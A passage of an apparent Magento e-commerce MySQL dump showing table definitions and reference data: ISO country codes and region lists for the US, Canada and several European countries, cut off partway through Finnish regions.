(9878, NULL, 'ubs2hvag0189nic47g35gnq1d9', '2026-05-10 14:52:19'),
(9879, NULL, '5s0tgnc5m7q1u48lggb5juktq0', '2026-05-10 14:52:21'),
(9880, NULL, '2tk1rd37b2ilkihrav31mv9ug9', '2026-05-10 14:52:23'),
(9881, NULL, 'edu35pu50bjkn2i356doi3gqha', '2026-05-10 14:52:25'),
(9882, NULL, 'm9jsuc8kec8ae27p2ir2748itb', '2026-05-10 14:52:26'),
(9883, NULL, 'iqi5j40mgure58bo63ps3q3235', '2026-05-10 14:52:26'),
(9884, NULL, 'io4q3bt7a6rq5n8ocr8p6am4qj', '2026-05-10 14:52:27'),
(9885, NULL, '4ufqdbckg8fc9a08li8m7hnfge', '2026-05-10 14:52:30'),
(9886, NULL, '7ejg5a9lhvskesjb2di91ip6kk', '2026-05-10 14:52:32'),
(9887, NULL, 'fssm191e4d6u8qpnck86vs0il6', '2026-05-10 14:52:33'),
(9888, NULL, 'cokpgil0mbi9mcdrrv6lv0viqf', '2026-05-10 14:52:34'),
(9889, NULL, 'kfrel4d97unfil41t5ps1pln0b', '2026-05-10 14:52:37'),
(9890, NULL, '0kgunnqo5f4cc8legedmrsitd5', '2026-05-10 14:52:40'),
(9891, NULL, 'd4v93928vsu5kram299npbqqun', '2026-05-10 14:52:43'),
(9892, NULL, '69m3p3dr7hgbeenbgmhtoop92u', '2026-05-10 15:03:25'),
(9893, NULL, 'g7u4mqf52cn6p8upceka283g38', '2026-05-10 19:03:10'),
(9894, NULL, 'gummt7mucqckuvge7joflgdlcn', '2026-05-10 20:00:11'),
(9895, NULL, 'f2o5jq9gqro4kh8nv2gq6u737t', '2026-05-10 21:12:12'),
(9896, NULL, 'ov1f4uib6vh7a3t8v7k6klinl1', '2026-05-10 21:41:15'),
(9897, NULL, 'stl76fvii68qstnfj748thed0a', '2026-05-10 22:45:56'),
(9898, NULL, '7jau8a7p3d9mpdmoid9llfm3a2', '2026-05-11 07:20:42'),
(9899, NULL, 'qv3r6592hkobg2f5t51n79qrng', '2026-05-11 11:16:17'),
(9900, NULL, 'jtav59sanmvmb7qj82pcmmotnu', '2026-05-11 11:34:00'),
(9901, NULL, 'vj9n6aqeoplvbjocq3d38p1g31', '2026-05-11 13:15:04'),
(9902, NULL, 'bnknv1pkcfoggrkgk9hhjjqjvd', '2026-05-11 13:15:05'),
(9903, NULL, '1qtl5ibkgjhimhk94emdnbh9gt', '2026-05-11 13:15:06'),
(9904, NULL, 'd1ljfi137jisjtarcuj09unh0i', '2026-05-11 13:15:07'),
(9905, NULL, '3e4e1820vp6jgmiv2aah58sils', '2026-05-11 22:57:35'),
(9906, NULL, '8tsv5p0fi5bnmjngdgotmoujs9', '2026-05-11 23:57:19'),
(9907, NULL, 'uf4dhrpuis2lhviba3k01ebpcb', '2026-05-12 01:19:21'),
(9908, NULL, '67rr10o8s8hivgkbudhrnufjev', '2026-05-12 01:50:54'),
(9909, NULL, 'fhjh9iumbu5ccabcb9gut6r89e', '2026-05-12 02:10:31'),
(9910, NULL, 'i61o3gnr3jd96ofpuphcouij3e', '2026-05-12 04:30:30'),
(9911, NULL, 'anjuv03usmpqai76b6t34dcqdc', '2026-05-12 08:05:18'),
(9912, NULL, 'i9pf2jl8sofldc7la4nb2q6u19', '2026-05-12 08:33:01');

-- --------------------------------------------------------

--
-- Table structure for table `design_change`
--

CREATE TABLE `design_change` (
  `design_change_id` int(11) NOT NULL COMMENT 'Design Change ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `design` varchar(255) DEFAULT NULL COMMENT 'Design',
  `date_from` date DEFAULT NULL COMMENT 'First Date of Design Activity',
  `date_to` date DEFAULT NULL COMMENT 'Last Date of Design Activity'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Design Changes';

-- --------------------------------------------------------

--
-- Table structure for table `design_config_grid_flat`
--

CREATE TABLE `design_config_grid_flat` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `store_website_id` int(11) DEFAULT NULL COMMENT 'Store_website_id',
  `store_group_id` int(11) DEFAULT NULL COMMENT 'Store_group_id',
  `store_id` int(11) DEFAULT NULL COMMENT 'Store_id',
  `theme_theme_id` varchar(255) DEFAULT NULL COMMENT 'Theme_theme_id'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='design_config_grid_flat';

--
-- Dumping data for table `design_config_grid_flat`
--

INSERT INTO `design_config_grid_flat` (`entity_id`, `store_website_id`, `store_group_id`, `store_id`, `theme_theme_id`) VALUES
(0, NULL, NULL, NULL, '3'),
(1, 1, NULL, NULL, '3'),
(2, 1, 1, 1, '4');

-- --------------------------------------------------------

--
-- Table structure for table `directory_country`
--

CREATE TABLE `directory_country` (
  `country_id` varchar(2) NOT NULL COMMENT 'Country ID in ISO-2',
  `iso2_code` varchar(2) DEFAULT NULL COMMENT 'Country ISO-2 format',
  `iso3_code` varchar(3) DEFAULT NULL COMMENT 'Country ISO-3'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Directory Country';

--
-- Dumping data for table `directory_country`
--

INSERT INTO `directory_country` (`country_id`, `iso2_code`, `iso3_code`) VALUES
('AD', 'AD', 'AND'),
('AE', 'AE', 'ARE'),
('AF', 'AF', 'AFG'),
('AG', 'AG', 'ATG'),
('AI', 'AI', 'AIA'),
('AL', 'AL', 'ALB'),
('AM', 'AM', 'ARM'),
('AN', 'AN', 'ANT'),
('AO', 'AO', 'AGO'),
('AQ', 'AQ', 'ATA'),
('AR', 'AR', 'ARG'),
('AS', 'AS', 'ASM'),
('AT', 'AT', 'AUT'),
('AU', 'AU', 'AUS'),
('AW', 'AW', 'ABW'),
('AX', 'AX', 'ALA'),
('AZ', 'AZ', 'AZE'),
('BA', 'BA', 'BIH'),
('BB', 'BB', 'BRB'),
('BD', 'BD', 'BGD'),
('BE', 'BE', 'BEL'),
('BF', 'BF', 'BFA'),
('BG', 'BG', 'BGR'),
('BH', 'BH', 'BHR'),
('BI', 'BI', 'BDI'),
('BJ', 'BJ', 'BEN'),
('BL', 'BL', 'BLM'),
('BM', 'BM', 'BMU'),
('BN', 'BN', 'BRN'),
('BO', 'BO', 'BOL'),
('BQ', 'BQ', 'BES'),
('BR', 'BR', 'BRA'),
('BS', 'BS', 'BHS'),
('BT', 'BT', 'BTN'),
('BV', 'BV', 'BVT'),
('BW', 'BW', 'BWA'),
('BY', 'BY', 'BLR'),
('BZ', 'BZ', 'BLZ'),
('CA', 'CA', 'CAN'),
('CC', 'CC', 'CCK'),
('CD', 'CD', 'COD'),
('CF', 'CF', 'CAF'),
('CG', 'CG', 'COG'),
('CH', 'CH', 'CHE'),
('CI', 'CI', 'CIV'),
('CK', 'CK', 'COK'),
('CL', 'CL', 'CHL'),
('CM', 'CM', 'CMR'),
('CN', 'CN', 'CHN'),
('CO', 'CO', 'COL'),
('CR', 'CR', 'CRI'),
('CU', 'CU', 'CUB'),
('CV', 'CV', 'CPV'),
('CW', 'CW', 'CUW'),
('CX', 'CX', 'CXR'),
('CY', 'CY', 'CYP'),
('CZ', 'CZ', 'CZE'),
('DE', 'DE', 'DEU'),
('DJ', 'DJ', 'DJI'),
('DK', 'DK', 'DNK'),
('DM', 'DM', 'DMA'),
('DO', 'DO', 'DOM'),
('DZ', 'DZ', 'DZA'),
('EC', 'EC', 'ECU'),
('EE', 'EE', 'EST'),
('EG', 'EG', 'EGY'),
('EH', 'EH', 'ESH'),
('ER', 'ER', 'ERI'),
('ES', 'ES', 'ESP'),
('ET', 'ET', 'ETH'),
('FI', 'FI', 'FIN'),
('FJ', 'FJ', 'FJI'),
('FK', 'FK', 'FLK'),
('FM', 'FM', 'FSM'),
('FO', 'FO', 'FRO'),
('FR', 'FR', 'FRA'),
('GA', 'GA', 'GAB'),
('GB', 'GB', 'GBR'),
('GD', 'GD', 'GRD'),
('GE', 'GE', 'GEO'),
('GF', 'GF', 'GUF'),
('GG', 'GG', 'GGY'),
('GH', 'GH', 'GHA'),
('GI', 'GI', 'GIB'),
('GL', 'GL', 'GRL'),
('GM', 'GM', 'GMB'),
('GN', 'GN', 'GIN'),
('GP', 'GP', 'GLP'),
('GQ', 'GQ', 'GNQ'),
('GR', 'GR', 'GRC'),
('GS', 'GS', 'SGS'),
('GT', 'GT', 'GTM'),
('GU', 'GU', 'GUM'),
('GW', 'GW', 'GNB'),
('GY', 'GY', 'GUY'),
('HK', 'HK', 'HKG'),
('HM', 'HM', 'HMD'),
('HN', 'HN', 'HND'),
('HR', 'HR', 'HRV'),
('HT', 'HT', 'HTI'),
('HU', 'HU', 'HUN'),
('ID', 'ID', 'IDN'),
('IE', 'IE', 'IRL'),
('IL', 'IL', 'ISR'),
('IM', 'IM', 'IMN'),
('IN', 'IN', 'IND'),
('IO', 'IO', 'IOT'),
('IQ', 'IQ', 'IRQ'),
('IR', 'IR', 'IRN'),
('IS', 'IS', 'ISL'),
('IT', 'IT', 'ITA'),
('JE', 'JE', 'JEY'),
('JM', 'JM', 'JAM'),
('JO', 'JO', 'JOR'),
('JP', 'JP', 'JPN'),
('KE', 'KE', 'KEN'),
('KG', 'KG', 'KGZ'),
('KH', 'KH', 'KHM'),
('KI', 'KI', 'KIR'),
('KM', 'KM', 'COM'),
('KN', 'KN', 'KNA'),
('KP', 'KP', 'PRK'),
('KR', 'KR', 'KOR'),
('KW', 'KW', 'KWT'),
('KY', 'KY', 'CYM'),
('KZ', 'KZ', 'KAZ'),
('LA', 'LA', 'LAO'),
('LB', 'LB', 'LBN'),
('LC', 'LC', 'LCA'),
('LI', 'LI', 'LIE'),
('LK', 'LK', 'LKA'),
('LR', 'LR', 'LBR'),
('LS', 'LS', 'LSO'),
('LT', 'LT', 'LTU'),
('LU', 'LU', 'LUX'),
('LV', 'LV', 'LVA'),
('LY', 'LY', 'LBY'),
('MA', 'MA', 'MAR'),
('MC', 'MC', 'MCO'),
('MD', 'MD', 'MDA'),
('ME', 'ME', 'MNE'),
('MF', 'MF', 'MAF'),
('MG', 'MG', 'MDG'),
('MH', 'MH', 'MHL'),
('MK', 'MK', 'MKD'),
('ML', 'ML', 'MLI'),
('MM', 'MM', 'MMR'),
('MN', 'MN', 'MNG'),
('MO', 'MO', 'MAC'),
('MP', 'MP', 'MNP'),
('MQ', 'MQ', 'MTQ'),
('MR', 'MR', 'MRT'),
('MS', 'MS', 'MSR'),
('MT', 'MT', 'MLT'),
('MU', 'MU', 'MUS'),
('MV', 'MV', 'MDV'),
('MW', 'MW', 'MWI'),
('MX', 'MX', 'MEX'),
('MY', 'MY', 'MYS'),
('MZ', 'MZ', 'MOZ'),
('NA', 'NA', 'NAM'),
('NC', 'NC', 'NCL'),
('NE', 'NE', 'NER'),
('NF', 'NF', 'NFK'),
('NG', 'NG', 'NGA'),
('NI', 'NI', 'NIC'),
('NL', 'NL', 'NLD'),
('NO', 'NO', 'NOR'),
('NP', 'NP', 'NPL'),
('NR', 'NR', 'NRU'),
('NU', 'NU', 'NIU'),
('NZ', 'NZ', 'NZL'),
('OM', 'OM', 'OMN'),
('PA', 'PA', 'PAN'),
('PE', 'PE', 'PER'),
('PF', 'PF', 'PYF'),
('PG', 'PG', 'PNG'),
('PH', 'PH', 'PHL'),
('PK', 'PK', 'PAK'),
('PL', 'PL', 'POL'),
('PM', 'PM', 'SPM'),
('PN', 'PN', 'PCN'),
('PS', 'PS', 'PSE'),
('PT', 'PT', 'PRT'),
('PW', 'PW', 'PLW'),
('PY', 'PY', 'PRY'),
('QA', 'QA', 'QAT'),
('RE', 'RE', 'REU'),
('RO', 'RO', 'ROU'),
('RS', 'RS', 'SRB'),
('RU', 'RU', 'RUS'),
('RW', 'RW', 'RWA'),
('SA', 'SA', 'SAU'),
('SB', 'SB', 'SLB'),
('SC', 'SC', 'SYC'),
('SD', 'SD', 'SDN'),
('SE', 'SE', 'SWE'),
('SG', 'SG', 'SGP'),
('SH', 'SH', 'SHN'),
('SI', 'SI', 'SVN'),
('SJ', 'SJ', 'SJM'),
('SK', 'SK', 'SVK'),
('SL', 'SL', 'SLE'),
('SM', 'SM', 'SMR'),
('SN', 'SN', 'SEN'),
('SO', 'SO', 'SOM'),
('SR', 'SR', 'SUR'),
('ST', 'ST', 'STP'),
('SV', 'SV', 'SLV'),
('SX', 'SX', 'SXM'),
('SY', 'SY', 'SYR'),
('SZ', 'SZ', 'SWZ'),
('TC', 'TC', 'TCA'),
('TD', 'TD', 'TCD'),
('TF', 'TF', 'ATF'),
('TG', 'TG', 'TGO'),
('TH', 'TH', 'THA'),
('TJ', 'TJ', 'TJK'),
('TK', 'TK', 'TKL'),
('TL', 'TL', 'TLS'),
('TM', 'TM', 'TKM'),
('TN', 'TN', 'TUN'),
('TO', 'TO', 'TON'),
('TR', 'TR', 'TUR'),
('TT', 'TT', 'TTO'),
('TV', 'TV', 'TUV'),
('TW', 'TW', 'TWN'),
('TZ', 'TZ', 'TZA'),
('UA', 'UA', 'UKR'),
('UG', 'UG', 'UGA'),
('UM', 'UM', 'UMI'),
('US', 'US', 'USA'),
('UY', 'UY', 'URY'),
('UZ', 'UZ', 'UZB'),
('VA', 'VA', 'VAT'),
('VC', 'VC', 'VCT'),
('VE', 'VE', 'VEN'),
('VG', 'VG', 'VGB'),
('VI', 'VI', 'VIR'),
('VN', 'VN', 'VNM'),
('VU', 'VU', 'VUT'),
('WF', 'WF', 'WLF'),
('WS', 'WS', 'WSM'),
('XK', 'XK', 'XKX'),
('YE', 'YE', 'YEM'),
('YT', 'YT', 'MYT'),
('ZA', 'ZA', 'ZAF'),
('ZM', 'ZM', 'ZMB'),
('ZW', 'ZW', 'ZWE');

-- --------------------------------------------------------

--
-- Table structure for table `directory_country_format`
--

CREATE TABLE `directory_country_format` (
  `country_format_id` int(10) UNSIGNED NOT NULL COMMENT 'Country Format ID',
  `country_id` varchar(2) DEFAULT NULL COMMENT 'Country ID in ISO-2',
  `type` varchar(30) DEFAULT NULL COMMENT 'Country Format Type',
  `format` text NOT NULL COMMENT 'Country Format'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Directory Country Format';

-- --------------------------------------------------------

--
-- Table structure for table `directory_country_region`
--

CREATE TABLE `directory_country_region` (
  `region_id` int(10) UNSIGNED NOT NULL COMMENT 'Region ID',
  `country_id` varchar(4) NOT NULL DEFAULT '0' COMMENT 'Country ID in ISO-2',
  `code` varchar(32) DEFAULT NULL COMMENT 'Region code',
  `default_name` varchar(255) DEFAULT NULL COMMENT 'Region Name'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Directory Country Region';

--
-- Dumping data for table `directory_country_region`
--

INSERT INTO `directory_country_region` (`region_id`, `country_id`, `code`, `default_name`) VALUES
(1, 'US', 'AL', 'Alabama'),
(2, 'US', 'AK', 'Alaska'),
(3, 'US', 'AS', 'American Samoa'),
(4, 'US', 'AZ', 'Arizona'),
(5, 'US', 'AR', 'Arkansas'),
(6, 'US', 'AE', 'Armed Forces Africa'),
(7, 'US', 'AA', 'Armed Forces Americas'),
(8, 'US', 'AE', 'Armed Forces Canada'),
(9, 'US', 'AE', 'Armed Forces Europe'),
(10, 'US', 'AE', 'Armed Forces Middle East'),
(11, 'US', 'AP', 'Armed Forces Pacific'),
(12, 'US', 'CA', 'California'),
(13, 'US', 'CO', 'Colorado'),
(14, 'US', 'CT', 'Connecticut'),
(15, 'US', 'DE', 'Delaware'),
(16, 'US', 'DC', 'District of Columbia'),
(17, 'US', 'FM', 'Federated States Of Micronesia'),
(18, 'US', 'FL', 'Florida'),
(19, 'US', 'GA', 'Georgia'),
(20, 'US', 'GU', 'Guam'),
(21, 'US', 'HI', 'Hawaii'),
(22, 'US', 'ID', 'Idaho'),
(23, 'US', 'IL', 'Illinois'),
(24, 'US', 'IN', 'Indiana'),
(25, 'US', 'IA', 'Iowa'),
(26, 'US', 'KS', 'Kansas'),
(27, 'US', 'KY', 'Kentucky'),
(28, 'US', 'LA', 'Louisiana'),
(29, 'US', 'ME', 'Maine'),
(30, 'US', 'MH', 'Marshall Islands'),
(31, 'US', 'MD', 'Maryland'),
(32, 'US', 'MA', 'Massachusetts'),
(33, 'US', 'MI', 'Michigan'),
(34, 'US', 'MN', 'Minnesota'),
(35, 'US', 'MS', 'Mississippi'),
(36, 'US', 'MO', 'Missouri'),
(37, 'US', 'MT', 'Montana'),
(38, 'US', 'NE', 'Nebraska'),
(39, 'US', 'NV', 'Nevada'),
(40, 'US', 'NH', 'New Hampshire'),
(41, 'US', 'NJ', 'New Jersey'),
(42, 'US', 'NM', 'New Mexico'),
(43, 'US', 'NY', 'New York'),
(44, 'US', 'NC', 'North Carolina'),
(45, 'US', 'ND', 'North Dakota'),
(46, 'US', 'MP', 'Northern Mariana Islands'),
(47, 'US', 'OH', 'Ohio'),
(48, 'US', 'OK', 'Oklahoma'),
(49, 'US', 'OR', 'Oregon'),
(50, 'US', 'PW', 'Palau'),
(51, 'US', 'PA', 'Pennsylvania'),
(52, 'US', 'PR', 'Puerto Rico'),
(53, 'US', 'RI', 'Rhode Island'),
(54, 'US', 'SC', 'South Carolina'),
(55, 'US', 'SD', 'South Dakota'),
(56, 'US', 'TN', 'Tennessee'),
(57, 'US', 'TX', 'Texas'),
(58, 'US', 'UT', 'Utah'),
(59, 'US', 'VT', 'Vermont'),
(60, 'US', 'VI', 'Virgin Islands'),
(61, 'US', 'VA', 'Virginia'),
(62, 'US', 'WA', 'Washington'),
(63, 'US', 'WV', 'West Virginia'),
(64, 'US', 'WI', 'Wisconsin'),
(65, 'US', 'WY', 'Wyoming'),
(66, 'CA', 'AB', 'Alberta'),
(67, 'CA', 'BC', 'British Columbia'),
(68, 'CA', 'MB', 'Manitoba'),
(69, 'CA', 'NL', 'Newfoundland and Labrador'),
(70, 'CA', 'NB', 'New Brunswick'),
(71, 'CA', 'NS', 'Nova Scotia'),
(72, 'CA', 'NT', 'Northwest Territories'),
(73, 'CA', 'NU', 'Nunavut'),
(74, 'CA', 'ON', 'Ontario'),
(75, 'CA', 'PE', 'Prince Edward Island'),
(76, 'CA', 'QC', 'Quebec'),
(77, 'CA', 'SK', 'Saskatchewan'),
(78, 'CA', 'YT', 'Yukon Territory'),
(79, 'DE', 'NDS', 'Niedersachsen'),
(80, 'DE', 'BAW', 'Baden-Württemberg'),
(81, 'DE', 'BAY', 'Bayern'),
(82, 'DE', 'BER', 'Berlin'),
(83, 'DE', 'BRG', 'Brandenburg'),
(84, 'DE', 'BRE', 'Bremen'),
(85, 'DE', 'HAM', 'Hamburg'),
(86, 'DE', 'HES', 'Hessen'),
(87, 'DE', 'MEC', 'Mecklenburg-Vorpommern'),
(88, 'DE', 'NRW', 'Nordrhein-Westfalen'),
(89, 'DE', 'RHE', 'Rheinland-Pfalz'),
(90, 'DE', 'SAR', 'Saarland'),
(91, 'DE', 'SAS', 'Sachsen'),
(92, 'DE', 'SAC', 'Sachsen-Anhalt'),
(93, 'DE', 'SCN', 'Schleswig-Holstein'),
(94, 'DE', 'THE', 'Thüringen'),
(95, 'AT', 'WI', 'Wien'),
(96, 'AT', 'NO', 'Niederösterreich'),
(97, 'AT', 'OO', 'Oberösterreich'),
(98, 'AT', 'SB', 'Salzburg'),
(99, 'AT', 'KN', 'Kärnten'),
(100, 'AT', 'ST', 'Steiermark'),
(101, 'AT', 'TI', 'Tirol'),
(102, 'AT', 'BL', 'Burgenland'),
(103, 'AT', 'VB', 'Vorarlberg'),
(104, 'CH', 'AG', 'Aargau'),
(105, 'CH', 'AI', 'Appenzell Innerrhoden'),
(106, 'CH', 'AR', 'Appenzell Ausserrhoden'),
(107, 'CH', 'BE', 'Bern'),
(108, 'CH', 'BL', 'Basel-Landschaft'),
(109, 'CH', 'BS', 'Basel-Stadt'),
(110, 'CH', 'FR', 'Freiburg'),
(111, 'CH', 'GE', 'Genf'),
(112, 'CH', 'GL', 'Glarus'),
(113, 'CH', 'GR', 'Graubünden'),
(114, 'CH', 'JU', 'Jura'),
(115, 'CH', 'LU', 'Luzern'),
(116, 'CH', 'NE', 'Neuenburg'),
(117, 'CH', 'NW', 'Nidwalden'),
(118, 'CH', 'OW', 'Obwalden'),
(119, 'CH', 'SG', 'St. Gallen'),
(120, 'CH', 'SH', 'Schaffhausen'),
(121, 'CH', 'SO', 'Solothurn'),
(122, 'CH', 'SZ', 'Schwyz'),
(123, 'CH', 'TG', 'Thurgau'),
(124, 'CH', 'TI', 'Tessin'),
(125, 'CH', 'UR', 'Uri'),
(126, 'CH', 'VD', 'Waadt'),
(127, 'CH', 'VS', 'Wallis'),
(128, 'CH', 'ZG', 'Zug'),
(129, 'CH', 'ZH', 'Zürich'),
(130, 'ES', 'A Coruсa', 'A Coruña'),
(131, 'ES', 'Alava', 'Alava'),
(132, 'ES', 'Albacete', 'Albacete'),
(133, 'ES', 'Alicante', 'Alicante'),
(134, 'ES', 'Almeria', 'Almeria'),
(135, 'ES', 'Asturias', 'Asturias'),
(136, 'ES', 'Avila', 'Avila'),
(137, 'ES', 'Badajoz', 'Badajoz'),
(138, 'ES', 'Baleares', 'Baleares'),
(139, 'ES', 'Barcelona', 'Barcelona'),
(140, 'ES', 'Burgos', 'Burgos'),
(141, 'ES', 'Caceres', 'Caceres'),
(142, 'ES', 'Cadiz', 'Cadiz'),
(143, 'ES', 'Cantabria', 'Cantabria'),
(144, 'ES', 'Castellon', 'Castellon'),
(145, 'ES', 'Ceuta', 'Ceuta'),
(146, 'ES', 'Ciudad Real', 'Ciudad Real'),
(147, 'ES', 'Cordoba', 'Cordoba'),
(148, 'ES', 'Cuenca', 'Cuenca'),
(149, 'ES', 'Girona', 'Girona'),
(150, 'ES', 'Granada', 'Granada'),
(151, 'ES', 'Guadalajara', 'Guadalajara'),
(152, 'ES', 'Guipuzcoa', 'Guipuzcoa'),
(153, 'ES', 'Huelva', 'Huelva'),
(154, 'ES', 'Huesca', 'Huesca'),
(155, 'ES', 'Jaen', 'Jaen'),
(156, 'ES', 'La Rioja', 'La Rioja'),
(157, 'ES', 'Las Palmas', 'Las Palmas'),
(158, 'ES', 'Leon', 'Leon'),
(159, 'ES', 'Lleida', 'Lleida'),
(160, 'ES', 'Lugo', 'Lugo'),
(161, 'ES', 'Madrid', 'Madrid'),
(162, 'ES', 'Malaga', 'Malaga'),
(163, 'ES', 'Melilla', 'Melilla'),
(164, 'ES', 'Murcia', 'Murcia'),
(165, 'ES', 'Navarra', 'Navarra'),
(166, 'ES', 'Ourense', 'Ourense'),
(167, 'ES', 'Palencia', 'Palencia'),
(168, 'ES', 'Pontevedra', 'Pontevedra'),
(169, 'ES', 'Salamanca', 'Salamanca'),
(170, 'ES', 'Santa Cruz de Tenerife', 'Santa Cruz de Tenerife'),
(171, 'ES', 'Segovia', 'Segovia'),
(172, 'ES', 'Sevilla', 'Sevilla'),
(173, 'ES', 'Soria', 'Soria'),
(174, 'ES', 'Tarragona', 'Tarragona'),
(175, 'ES', 'Teruel', 'Teruel'),
(176, 'ES', 'Toledo', 'Toledo'),
(177, 'ES', 'Valencia', 'Valencia'),
(178, 'ES', 'Valladolid', 'Valladolid'),
(179, 'ES', 'Vizcaya', 'Vizcaya'),
(180, 'ES', 'Zamora', 'Zamora'),
(181, 'ES', 'Zaragoza', 'Zaragoza'),
(182, 'FR', '1', 'Ain'),
(183, 'FR', '2', 'Aisne'),
(184, 'FR', '3', 'Allier'),
(185, 'FR', '4', 'Alpes-de-Haute-Provence'),
(186, 'FR', '5', 'Hautes-Alpes'),
(187, 'FR', '6', 'Alpes-Maritimes'),
(188, 'FR', '7', 'Ardèche'),
(189, 'FR', '8', 'Ardennes'),
(190, 'FR', '9', 'Ariège'),
(191, 'FR', '10', 'Aube'),
(192, 'FR', '11', 'Aude'),
(193, 'FR', '12', 'Aveyron'),
(194, 'FR', '13', 'Bouches-du-Rhône'),
(195, 'FR', '14', 'Calvados'),
(196, 'FR', '15', 'Cantal'),
(197, 'FR', '16', 'Charente'),
(198, 'FR', '17', 'Charente-Maritime'),
(199, 'FR', '18', 'Cher'),
(200, 'FR', '19', 'Corrèze'),
(201, 'FR', '2A', 'Corse-du-Sud'),
(202, 'FR', '2B', 'Haute-Corse'),
(203, 'FR', '21', 'Côte-d\'Or'),
(204, 'FR', '22', 'Côtes-d\'Armor'),
(205, 'FR', '23', 'Creuse'),
(206, 'FR', '24', 'Dordogne'),
(207, 'FR', '25', 'Doubs'),
(208, 'FR', '26', 'Drôme'),
(209, 'FR', '27', 'Eure'),
(210, 'FR', '28', 'Eure-et-Loir'),
(211, 'FR', '29', 'Finistère'),
(212, 'FR', '30', 'Gard'),
(213, 'FR', '31', 'Haute-Garonne'),
(214, 'FR', '32', 'Gers'),
(215, 'FR', '33', 'Gironde'),
(216, 'FR', '34', 'Hérault'),
(217, 'FR', '35', 'Ille-et-Vilaine'),
(218, 'FR', '36', 'Indre'),
(219, 'FR', '37', 'Indre-et-Loire'),
(220, 'FR', '38', 'Isère'),
(221, 'FR', '39', 'Jura'),
(222, 'FR', '40', 'Landes'),
(223, 'FR', '41', 'Loir-et-Cher'),
(224, 'FR', '42', 'Loire'),
(225, 'FR', '43', 'Haute-Loire'),
(226, 'FR', '44', 'Loire-Atlantique'),
(227, 'FR', '45', 'Loiret'),
(228, 'FR', '46', 'Lot'),
(229, 'FR', '47', 'Lot-et-Garonne'),
(230, 'FR', '48', 'Lozère'),
(231, 'FR', '49', 'Maine-et-Loire'),
(232, 'FR', '50', 'Manche'),
(233, 'FR', '51', 'Marne'),
(234, 'FR', '52', 'Haute-Marne'),
(235, 'FR', '53', 'Mayenne'),
(236, 'FR', '54', 'Meurthe-et-Moselle'),
(237, 'FR', '55', 'Meuse'),
(238, 'FR', '56', 'Morbihan'),
(239, 'FR', '57', 'Moselle'),
(240, 'FR', '58', 'Nièvre'),
(241, 'FR', '59', 'Nord'),
(242, 'FR', '60', 'Oise'),
(243, 'FR', '61', 'Orne'),
(244, 'FR', '62', 'Pas-de-Calais'),
(245, 'FR', '63', 'Puy-de-Dôme'),
(246, 'FR', '64', 'Pyrénées-Atlantiques'),
(247, 'FR', '65', 'Hautes-Pyrénées'),
(248, 'FR', '66', 'Pyrénées-Orientales'),
(249, 'FR', '67', 'Bas-Rhin'),
(250, 'FR', '68', 'Haut-Rhin'),
(251, 'FR', '69', 'Rhône'),
(252, 'FR', '70', 'Haute-Saône'),
(253, 'FR', '71', 'Saône-et-Loire'),
(254, 'FR', '72', 'Sarthe'),
(255, 'FR', '73', 'Savoie'),
(256, 'FR', '74', 'Haute-Savoie'),
(257, 'FR', '75', 'Paris'),
(258, 'FR', '76', 'Seine-Maritime'),
(259, 'FR', '77', 'Seine-et-Marne'),
(260, 'FR', '78', 'Yvelines'),
(261, 'FR', '79', 'Deux-Sèvres'),
(262, 'FR', '80', 'Somme'),
(263, 'FR', '81', 'Tarn'),
(264, 'FR', '82', 'Tarn-et-Garonne'),
(265, 'FR', '83', 'Var'),
(266, 'FR', '84', 'Vaucluse'),
(267, 'FR', '85', 'Vendée'),
(268, 'FR', '86', 'Vienne'),
(269, 'FR', '87', 'Haute-Vienne'),
(270, 'FR', '88', 'Vosges'),
(271, 'FR', '89', 'Yonne'),
(272, 'FR', '90', 'Territoire-de-Belfort'),
(273, 'FR', '91', 'Essonne'),
(274, 'FR', '92', 'Hauts-de-Seine'),
(275, 'FR', '93', 'Seine-Saint-Denis'),
(276, 'FR', '94', 'Val-de-Marne'),
(277, 'FR', '95', 'Val-d\'Oise'),
(278, 'RO', 'AB', 'Alba'),
(279, 'RO', 'AR', 'Arad'),
(280, 'RO', 'AG', 'Argeş'),
(281, 'RO', 'BC', 'Bacău'),
(282, 'RO', 'BH', 'Bihor'),
(283, 'RO', 'BN', 'Bistriţa-Năsăud'),
(284, 'RO', 'BT', 'Botoşani'),
(285, 'RO', 'BV', 'Braşov'),
(286, 'RO', 'BR', 'Brăila'),
(287, 'RO', 'B', 'Bucureşti'),
(288, 'RO', 'BZ', 'Buzău'),
(289, 'RO', 'CS', 'Caraş-Severin'),
(290, 'RO', 'CL', 'Călăraşi'),
(291, 'RO', 'CJ', 'Cluj'),
(292, 'RO', 'CT', 'Constanţa'),
(293, 'RO', 'CV', 'Covasna'),
(294, 'RO', 'DB', 'Dâmboviţa'),
(295, 'RO', 'DJ', 'Dolj'),
(296, 'RO', 'GL', 'Galaţi'),
(297, 'RO', 'GR', 'Giurgiu'),
(298, 'RO', 'GJ', 'Gorj'),
(299, 'RO', 'HR', 'Harghita'),
(300, 'RO', 'HD', 'Hunedoara'),
(301, 'RO', 'IL', 'Ialomiţa'),
(302, 'RO', 'IS', 'Iaşi'),
(303, 'RO', 'IF', 'Ilfov'),
(304, 'RO', 'MM', 'Maramureş'),
(305, 'RO', 'MH', 'Mehedinţi'),
(306, 'RO', 'MS', 'Mureş'),
(307, 'RO', 'NT', 'Neamţ'),
(308, 'RO', 'OT', 'Olt'),
(309, 'RO', 'PH', 'Prahova'),
(310, 'RO', 'SM', 'Satu-Mare'),
(311, 'RO', 'SJ', 'Sălaj'),
(312, 'RO', 'SB', 'Sibiu'),
(313, 'RO', 'SV', 'Suceava'),
(314, 'RO', 'TR', 'Teleorman'),
(315, 'RO', 'TM', 'Timiş'),
(316, 'RO', 'TL', 'Tulcea'),
(317, 'RO', 'VS', 'Vaslui'),
(318, 'RO', 'VL', 'Vâlcea'),
(319, 'RO', 'VN', 'Vrancea'),
(320, 'FI', 'Lappi', 'Lappi'),
(321, 'FI', 'Pohjois-Pohjanmaa', 'Pohjois-Pohjanmaa'),
(322, 'FI', 'Kainuu', 'Kainuu'),
(323, 'FI', 'Pohjois-Karjala', 'Pohjois-Karjala'),
